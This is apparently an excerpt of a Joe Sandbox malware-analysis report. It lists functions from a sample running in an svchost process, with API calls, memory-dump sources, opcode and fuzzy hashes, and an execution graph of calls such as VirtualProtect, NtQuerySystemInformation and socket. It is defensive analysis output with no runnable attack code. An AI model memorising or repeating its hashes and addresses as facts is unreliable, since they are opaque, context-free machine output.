                                                                                                                    • Opcode Fuzzy Hash: 116888554fdc444eb3b31b19c2a321043db278ac29c98a48040ccefe69ec064d
                                                                                                                    • Instruction Fuzzy Hash: 3D511C34A18D499FE798FB24C4987E6B2A1FF54305F50413AD81FC26A2DF38A459CB80
                                                                                                                    Function 00007DF45B6EDA74 Relevance: 1.4, APIs: 1, Instructions: 147COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007DF45B6FE150: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF45B6FC0F7), ref: 00007DF45B6FE160
                                                                                                                    • malloc.MSVCRT ref: 00007DF45B6EDB44
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AcceptConnectPortmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3101135750-0
                                                                                                                    • Opcode ID: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                    • Instruction ID: e225aeb1e71ac665b63aae19a4aa24976ca9fe856dd1c0d2e8fe8df01b08843f
                                                                                                                    • Opcode Fuzzy Hash: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                    • Instruction Fuzzy Hash: 44412D70508A4C8FDB64EF19D8857AA77E5FB58301F10416ADC4ECB391EE34E985CB92
                                                                                                                    Function 00007DF45B6D4F54 Relevance: 1.4, APIs: 1, Instructions: 126COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2803490479-0
                                                                                                                    • Opcode ID: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                    • Instruction ID: 04f7e6c672aee8a5bca8d77cf3607f2a525e5749d5cf546eb527a673cc87cdcf
                                                                                                                    • Opcode Fuzzy Hash: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                    • Instruction Fuzzy Hash: ED31C031608A4A6FEB58FA64D849976B3F4FF54350B00862AD81FC6791EF64F84187C2
                                                                                                                    Function 00007DF45B6F51A0 Relevance: 1.3, APIs: 1, Instructions: 80COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: calloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2635317215-0
                                                                                                                    • Opcode ID: f9d8d64e7c2c4c7956bd9358d16aebce3c9b4a36e71dd88cc3658fe52e189f83
                                                                                                                    • Instruction ID: 1c5ba8cc1bbc59d28493fbb8d3cabea93bcd5ab5f681151079ffef5dae5798c1
                                                                                                                    • Opcode Fuzzy Hash: f9d8d64e7c2c4c7956bd9358d16aebce3c9b4a36e71dd88cc3658fe52e189f83
                                                                                                                    • Instruction Fuzzy Hash: 55211A30618A484BEB84EF68C8C579673E5EB98310F5442B6981EC739ADE38D845CB91
                                                                                                                    Function 00007DF45B79AD9C Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2803490479-0
                                                                                                                    • Opcode ID: 93b3089d9039be6dc48e4ad706bd316baf3c3e69dc3f5e79b84e474d63088cbc
                                                                                                                    • Instruction ID: 7ece8691b163fd7a701f353dbd71b78760364ab47964ff61d6fd3e73b5ae17eb
                                                                                                                    • Opcode Fuzzy Hash: 93b3089d9039be6dc48e4ad706bd316baf3c3e69dc3f5e79b84e474d63088cbc
                                                                                                                    • Instruction Fuzzy Hash: F3213770A04A488FEB84EF2CC0CCBA077E0FB19355B5441BAE85DCB39ADB7498858B01
                                                                                                                    Function 00007DF45B6E31B4 Relevance: 1.3, APIs: 1, Instructions: 71stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1586166983-0
                                                                                                                    • Opcode ID: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                    • Instruction ID: 72f67e0c53bb573a15bade8e54b6e7c22ca4b60e44210961b3edcd5eddfc6a91
                                                                                                                    • Opcode Fuzzy Hash: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                    • Instruction Fuzzy Hash: CF117230B145484FEBA9EB689C593AB36E1FF94300B14427BDC0FC67A6EE289904DB51
                                                                                                                    Function 00007DF45B6D272C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1263568516-0
                                                                                                                    • Opcode ID: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                    • Instruction ID: 4668dd42cfbc4f7f3a1b569c5f16160d1dd0b0c810aecd02381197d744202c7e
                                                                                                                    • Opcode Fuzzy Hash: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                    • Instruction Fuzzy Hash: BF011230A18D4A9FDBA8EB2CD84562632F1FB58315B54817FD41EC73D0DA29D8428B42
                                                                                                                    Function 0000013E033019B4 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 80 13e033019b4-13e033019d1 82 13e033019d3-13e033019da 80->82 83 13e033019dd-13e033019e4 80->83 82->83 84 13e033019e6-13e033019f9 VirtualFree 83->84 85 13e033019fb-13e03301a09 83->85 84->85
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2514095188.0000013E03300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013E03300000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_13e03300000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1263568516-0
                                                                                                                    • Opcode ID: 35bf1a61f723f2ebe461f85329f49c45ff48ebd9128404ff90ab1984f0afa418
                                                                                                                    • Instruction ID: bffc1c562528ae51f9304aff874fdc4c4fa165ca1eac3961dead7bc7facc3421
                                                                                                                    • Opcode Fuzzy Hash: 35bf1a61f723f2ebe461f85329f49c45ff48ebd9128404ff90ab1984f0afa418
                                                                                                                    • Instruction Fuzzy Hash: D9F03035254A098FDF5CEEA5C4D4BB133E4FB28301F040179DC4BCB196DA65E941C791
                                                                                                                    Function 00007DF45B733A10 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                    • Instruction ID: b2cf37aec1ec9021a5be94d9aff8bc1931f43023952df1370e9776cc788b0d34
                                                                                                                    • Opcode Fuzzy Hash: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                    • Instruction Fuzzy Hash: 43F0E13465FA4ACBFB68B7A998A823577E0EF14312B05003AFC0BC16A0CF6C95549726
                                                                                                                    Function 00007DF45B6D4090 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: calloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2635317215-0
                                                                                                                    • Opcode ID: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                    • Instruction ID: 24c7626de9d54fde56e8f5c382119e03bf07bd4fc9c4cbc6c8d661c85dfad1a8
                                                                                                                    • Opcode Fuzzy Hash: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                    • Instruction Fuzzy Hash: 2FF05E3061490A5FFB84AB289898B7676E4EF98341F944476D90ACA7A0DF78CC96D740
                                                                                                                    Function 00007DF45B6F7740 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 71969f7ba82f040737c07892c75cbb6ddbbd8e0156a438f90a0ebcf422641aac
                                                                                                                    • Instruction ID: d3e9a440af44c73b06e072ba3a287f34cf3c2bca8941aa5c5f29a16eb4cad595
                                                                                                                    • Opcode Fuzzy Hash: 71969f7ba82f040737c07892c75cbb6ddbbd8e0156a438f90a0ebcf422641aac
                                                                                                                    • Instruction Fuzzy Hash: 31E0BF3052595D8FEE49B764894876632E0FB19304F940465C40EC7394EE6DD544C742
                                                                                                                    Function 00007DF45B6D40EC Relevance: 1.3, APIs: 1, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                    • Instruction ID: b9f30451085205822a2cab1b41b638cf19e5b830af01b60c07e0f10a73ea8301
                                                                                                                    • Opcode Fuzzy Hash: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                    • Instruction Fuzzy Hash: 9BD05E3060AD0B0BEF9CBBAA48AA63532E0DF78342B14003D980BC5691CE19C851D301
                                                                                                                    Function 00007DF45B6DFF84 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2803490479-0
                                                                                                                    • Opcode ID: ed35e0f212f0a254e6baa594bb9cd44b71b95e4339f86f8b9042d1b76f972d3e
                                                                                                                    • Instruction ID: b9e871635f5a820624aded9d37d012fa53ade409cddb2b948c36e436b021ba90
                                                                                                                    • Opcode Fuzzy Hash: ed35e0f212f0a254e6baa594bb9cd44b71b95e4339f86f8b9042d1b76f972d3e
                                                                                                                    • Instruction Fuzzy Hash: EAD01210709D0A2FBB5037FA1C8C53625D4C7282227100022F819C0260EE48C990D312
                                                                                                                    Function 00007DF45B6D4D90 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                    • Instruction ID: 894f03ef391d0068d43685f5efd91a736aabb8485eee2478f4c994eb6277e7a3
                                                                                                                    • Opcode Fuzzy Hash: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                    • Instruction Fuzzy Hash: C8B0122881BCEB16FD5C33B74C6A02A3460AF04301FC40019EC1BC0650FB0DC4948343

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0000013E03300511 Relevance: .0, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2514095188.0000013E03300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013E03300000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_13e03300000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                    • Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
                                                                                                                    • Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                    • Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F
                                                                                                                    Function 00007DF45B701741 Relevance: .0, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000003.2513308661.00007DF45B6D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF45B6D1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_3_7df45b6d1000_svchost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                    • Instruction ID: 6b5de7765083f1fcecf79d76d96fc317e58b19ab22377307484a88b0d29399c3
                                                                                                                    • Opcode Fuzzy Hash: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                    • Instruction Fuzzy Hash: B4B01122E2880082C2080E0AB802330F2B2C30B300F003030200AF3A20C8A0CC802ACF

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:4.2%
                                                                                                                    Dynamic/Decrypted Code Coverage:24.8%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:318
                                                                                                                    Total number of Limit Nodes:28
                                                                                                                    execution_graph 34185 7df488d93cdc 34186 7df488d93ce9 34185->34186 34188 7df488d93d54 34185->34188 34187 7df488d93d1b SetWinEventHook 34186->34187 34186->34188 34187->34188 34189 7df488da063c 34190 7df488da0655 34189->34190 34192 7df488da064e 34189->34192 34191 7df488da068e free 34190->34191 34190->34192 34191->34192 34193 2614efdcee0 34194 2614efdcf49 34193->34194 34195 2614efdcef3 34193->34195 34199 2614efda7e0 34195->34199 34197 2614efdcf05 34198 2614efdcf28 ReadFile 34197->34198 34198->34194 34200 2614efda800 34199->34200 34201 2614efda847 34199->34201 34200->34201 34202 2614efda86b malloc 34200->34202 34201->34197 34202->34201 34203 2614efe84c0 SetErrorMode 34204 2614efe84d4 34203->34204 34205 2614efeb936 socket 34204->34205 34206 2614efeb97a getsockopt 34205->34206 34207 2614efeb9c3 socket 34205->34207 34206->34207 34209 2614efeb9e3 34207->34209 34210 2614efe2d80 34211 2614efe2d9f 34210->34211 34212 2614efe2d90 NtAcceptConnectPort 34210->34212 34212->34211 34213 2614efdcc9c 34214 2614efdccba 34213->34214 34227 2614efdcd34 34213->34227 34215 2614efdce5f 34214->34215 34216 2614efdcce0 34214->34216 34214->34227 34218 2614efda7e0 malloc 34215->34218 34217 2614efdce2e 34216->34217 34221 2614efdccf7 34216->34221 34220 2614efda7e0 malloc 34217->34220 34219 2614efdce42 34218->34219 34222 2614efdce93 ReadFile 34219->34222 34220->34219 34223 2614efdcded 34221->34223 34224 2614efdcd2b 34221->34224 34221->34227 34222->34227 34241 2614efdbc64 34223->34241 34224->34227 34228 2614efdc994 34224->34228 34229 2614efdcc66 34228->34229 34240 2614efdc9ce 34228->34240 34229->34227 34230 2614efdcc4f 34263 2614efda9d4 34230->34263 34232 2614efdcbca free 34233 2614efdcbd5 34232->34233 34233->34230 34258 2614efdc2d0 34233->34258 34235 2614efdcbc2 34262 2614efee398 free free free 34235->34262 34240->34229 34240->34232 34240->34233 34240->34235 34248 2614efee7e8 free free free 34240->34248 34249 2614efdaa34 34240->34249 34252 2614efedbcc 34240->34252 34242 2614efdbd60 34241->34242 34243 2614efdbc92 34241->34243 34242->34227 34243->34242 34244 2614efdbcb5 OpenFileMappingW 34243->34244 34244->34242 34245 2614efdbcd2 MapViewOfFile 34244->34245 34246 2614efdbd57 CloseHandle 34245->34246 34247 2614efdbcf0 34245->34247 34246->34242 34247->34246 34248->34240 34250 2614efdaa4f malloc 34249->34250 34251 2614efdaa6a 34249->34251 34250->34251 34251->34240 34253 2614efedbe5 34252->34253 34257 2614efedbde 34252->34257 34254 2614efedc1e free 34253->34254 34255 2614efedc24 34253->34255 34253->34257 34254->34255 34255->34257 34266 2614f014c3c 34255->34266 34257->34240 34259 2614efdc313 34258->34259 34261 2614efdc87a 34258->34261 34260 2614efdc7c0 VirtualAlloc 34259->34260 34259->34261 34260->34261 34261->34230 34262->34232 34264 2614efda9f8 34263->34264 34265 2614efda9e7 free 34263->34265 34264->34229 34265->34264 34265->34265 34267 2614f014c83 34266->34267 34268 2614f014c4a 34266->34268 34267->34257 34268->34267 34269 2614f014c65 free 34268->34269 34270 2614f014c6c free 34268->34270 34269->34270 34270->34267 34271 2614efd515c 34284 2614efe2a20 34271->34284 34273 2614efd5374 34274 2614efd51b5 34274->34273 34275 2614efd5367 34274->34275 34287 2614efe2dac 34274->34287 34296 2614efe290c 34275->34296 34282 2614efe2dac NtAcceptConnectPort 34283 2614efd52f2 34282->34283 34293 2614efe2ddc 34283->34293 34285 2614efe2a30 NtAcceptConnectPort 34284->34285 34286 2614efe2a45 34284->34286 34285->34286 34286->34274 34288 2614efe2dbc NtAcceptConnectPort 34287->34288 34289 2614efd5244 34287->34289 34288->34289 34289->34275 34290 2614efe2cac 34289->34290 34291 2614efe2cbf NtAcceptConnectPort 34290->34291 34292 2614efd5290 34290->34292 34291->34292 34292->34282 34292->34283 34294 2614efe2dec NtAcceptConnectPort 34293->34294 34295 2614efe2df0 34293->34295 34294->34295 34295->34275 34297 2614efe2920 34296->34297 34298 2614efe291c NtAcceptConnectPort 34296->34298 34297->34273 34298->34297 34299 2614efd5918 34302 2614efd6c68 34299->34302 34301 2614efd592a 34303 2614efd6c71 34302->34303 34310 2614efd6d54 34302->34310 34303->34310 34313 2614efe3218 34303->34313 34305 2614efd6d06 34305->34310 34321 2614efd3c88 34305->34321 34307 2614efd6d12 34308 2614efd6d29 SetErrorMode 34307->34308 34309 2614efd6d42 34308->34309 34312 2614efd6d6c 34308->34312 34309->34310 34325 2614efd69ec 34309->34325 34310->34301 34312->34301 34315 2614efe3265 34313->34315 34314 2614efe42a6 34314->34305 34315->34314 34316 2614efe3d5a RtlFormatCurrentUserKeyPath 34315->34316 34317 2614efe3d66 34315->34317 34316->34317 34317->34314 34318 2614efe3eab calloc 34317->34318 34318->34314 34319 2614efe3ed1 34318->34319 34319->34314 34341 2614efd563c 6 API calls 34319->34341 34322 2614efd3cbb 34321->34322 34323 2614efd3c95 34321->34323 34322->34307 34323->34322 34324 2614efd3c9b RtlAddFunctionTable 34323->34324 34324->34322 34326 2614efd69f5 34325->34326 34332 2614efd6a68 34325->34332 34327 2614efd6acd 34326->34327 34329 2614efd6a21 34326->34329 34369 2614efe105c 16 API calls 34327->34369 34330 2614efd6a3d 34329->34330 34331 2614efd6a99 34329->34331 34329->34332 34333 2614efd6a8c 34330->34333 34334 2614efd6a42 34330->34334 34368 2614efe16c8 13 API calls 34331->34368 34332->34310 34367 2614efe1188 16 API calls 34333->34367 34337 2614efd6a77 34334->34337 34338 2614efd6a47 34334->34338 34366 2614efe12bc 19 API calls 34337->34366 34338->34332 34342 2614efdd7c0 34338->34342 34341->34314 34343 2614efdd7e0 34342->34343 34344 2614efdaa34 malloc 34343->34344 34345 2614efdd7f3 34344->34345 34346 2614efdd85f CloseHandle 34345->34346 34347 2614efdd7fb MapViewOfFile 34345->34347 34348 2614efdd92b 34346->34348 34349 2614efdd871 34346->34349 34354 2614efdd825 34347->34354 34350 2614efda9d4 free 34348->34350 34349->34348 34370 2614efd2b54 34349->34370 34351 2614efdd935 34350->34351 34351->34332 34353 2614efdd881 34353->34348 34374 2614efde2a8 34353->34374 34359 2614efdd84a 34354->34359 34390 2614efe0674 malloc 34354->34390 34359->34346 34360 2614efdd893 34383 2614efdd3b4 6 API calls 34360->34383 34362 2614efdd898 34384 2614efd79a0 34362->34384 34364 2614efdd8e7 34391 2614efd2ba8 6 API calls 34364->34391 34366->34332 34367->34332 34368->34332 34369->34332 34371 2614efd2b64 34370->34371 34372 2614efd2b6d HeapCreate 34371->34372 34373 2614efd2b86 34371->34373 34372->34373 34373->34353 34375 2614efde2c0 34374->34375 34380 2614efde30a 34375->34380 34392 2614efd2c24 34375->34392 34377 2614efdd88e 34382 2614efde1dc GetSystemInfo VirtualAlloc 34377->34382 34378 2614efde317 VirtualProtect 34396 2614efd1000 34378->34396 34380->34377 34380->34378 34381 2614efde344 VirtualProtect 34381->34377 34382->34360 34383->34362 34386 2614efd79ce 34384->34386 34385 2614efd7c40 34385->34364 34386->34385 34387 2614efd7b8e 34386->34387 34405 2614efd77dc 34386->34405 34388 2614efda9d4 free 34387->34388 34388->34385 34390->34359 34391->34348 34393 2614efd2c52 34392->34393 34395 2614efd2cbc 34393->34395 34398 2614efd24c4 34393->34398 34395->34380 34397 2614efd100c 34396->34397 34397->34381 34401 2614efd22d4 GetSystemInfo 34398->34401 34400 2614efd24cd 34400->34395 34402 2614efd2305 34401->34402 34403 2614efd23cf 34402->34403 34404 2614efd23a4 VirtualAlloc 34402->34404 34403->34400 34403->34403 34404->34402 34404->34403 34406 2614efd7804 34405->34406 34413 2614efe3158 34406->34413 34408 2614efd782d 34410 2614efd7879 34408->34410 34417 2614efe2ec8 34408->34417 34411 2614efd78bb GetVolumeInformationW 34410->34411 34412 2614efd790c 34410->34412 34411->34412 34412->34387 34414 2614efe317b 34413->34414 34416 2614efe3173 34413->34416 34415 2614efe31dc NtAcceptConnectPort 34414->34415 34414->34416 34415->34416 34416->34408 34418 2614efe2f11 34417->34418 34419 2614efe2f67 NtAcceptConnectPort 34418->34419 34420 2614efe2f1b 34418->34420 34419->34420 34420->34410 34421 2614efd69b8 34422 2614efd69d4 34421->34422 34423 2614efd69d9 GetProcAddressForCaller 34422->34423 34424 2614efd69e2 34422->34424 34423->34424 34425 2614efd2978 34426 2614efd299e 34425->34426 34427 2614efd29a6 VirtualProtect 34425->34427 34426->34427 34429 2614efd29cb 34427->34429 34430 2614efd29c1 34427->34430 34428 2614efd2a0d VirtualProtect 34428->34430 34429->34428 34431 7df488dc25d4 NtQuerySystemInformation 34432 7df488dc25f7 34431->34432 34433 7df488dc2613 NtQuerySystemInformation 34432->34433 34434 7df488dc262f 34432->34434 34433->34434 34435 7df488d98c38 SetErrorMode 34436 7df488d98c4c 34435->34436 34437 7df488d9c8f2 socket 34436->34437 34438 7df488d9c981 34437->34438 34439 7df488d9c936 closesocket 34437->34439 34441 7df488d9c987 socket 34438->34441 34439->34441 34442 7df488d9c99f 34441->34442 34443 7df488dc47b8 34445 7df488dc47ee 34443->34445 34444 7df488dc4b08 34445->34444 34455 7df488dc1708 34445->34455 34449 7df488dc4909 calloc 34450 7df488dc4a12 34449->34450 34453 7df488dc482b 34449->34453 34464 7df488dc2730 NtQuerySystemInformation NtQuerySystemInformation 34450->34464 34451 7df488dc4958 34452 7df488dc49e3 SendMessageA 34451->34452 34452->34450 34453->34444 34453->34449 34453->34451 34456 7df488dc1715 34455->34456 34457 7df488dc173b 34455->34457 34456->34457 34458 7df488dc171b RtlAddFunctionTable 34456->34458 34459 7df488dc1740 34457->34459 34458->34457 34460 7df488dc1760 VirtualProtect 34459->34460 34462 7df488dc176f 34459->34462 34460->34462 34461 7df488dc180d 34461->34453 34462->34461 34463 7df488dc17e9 VirtualProtect 34462->34463 34463->34462 34465 2614efdbef0 34466 2614efdbf19 34465->34466 34467 2614efdbf29 34466->34467 34468 2614efdbf47 LoadLibraryA 34466->34468 34468->34467 34469 2614efd74f0 34472 2614efd7528 34469->34472 34470 2614efd7782 34471 2614efd75c3 VirtualFree 34471->34472 34472->34470 34472->34471 34473 7df488d93cb0 34474 7df488d93cc7 34473->34474 34477 7df488d92f48 34474->34477 34476 7df488d93cd5 34478 7df488d92f6a 34477->34478 34480 7df488d92f87 34478->34480 34481 7df488d92e90 NtQuerySystemInformation 34478->34481 34480->34476 34482 7df488d92eb3 34481->34482 34483 7df488d92eb9 malloc 34481->34483 34482->34483 34484 7df488d92ecf NtQuerySystemInformation 34483->34484 34485 7df488d92eeb 34483->34485 34484->34485 34485->34480 34486 7df488d94290 34488 7df488d942c3 34486->34488 34487 7df488d944c0 34488->34487 34497 7df488d91708 34488->34497 34492 7df488d94453 34493 7df488d9449b SendMessageA 34492->34493 34493->34487 34494 7df488d943f0 calloc 34495 7df488d942fe 34494->34495 34495->34487 34495->34492 34495->34494 34506 7df488d931bc free 34495->34506 34498 7df488d91715 34497->34498 34499 7df488d9173b 34497->34499 34498->34499 34500 7df488d9171b RtlAddFunctionTable 34498->34500 34501 7df488d91740 34499->34501 34500->34499 34502 7df488d91760 VirtualProtect 34501->34502 34504 7df488d9176f 34501->34504 34502->34504 34503 7df488d9180d 34503->34495 34504->34503 34505 7df488d917e9 VirtualProtect 34504->34505 34505->34504 34506->34495 34507 7df488de22cc 34509 7df488de22ee 34507->34509 34508 7df488de276d 34509->34508 34515 7df488de1290 34509->34515 34513 7df488de2754 SetTimer 34513->34508 34514 7df488de2329 34514->34508 34514->34513 34516 7df488de12c3 34515->34516 34517 7df488de129d 34515->34517 34519 7df488de12c8 34516->34519 34517->34516 34518 7df488de12a3 RtlAddFunctionTable 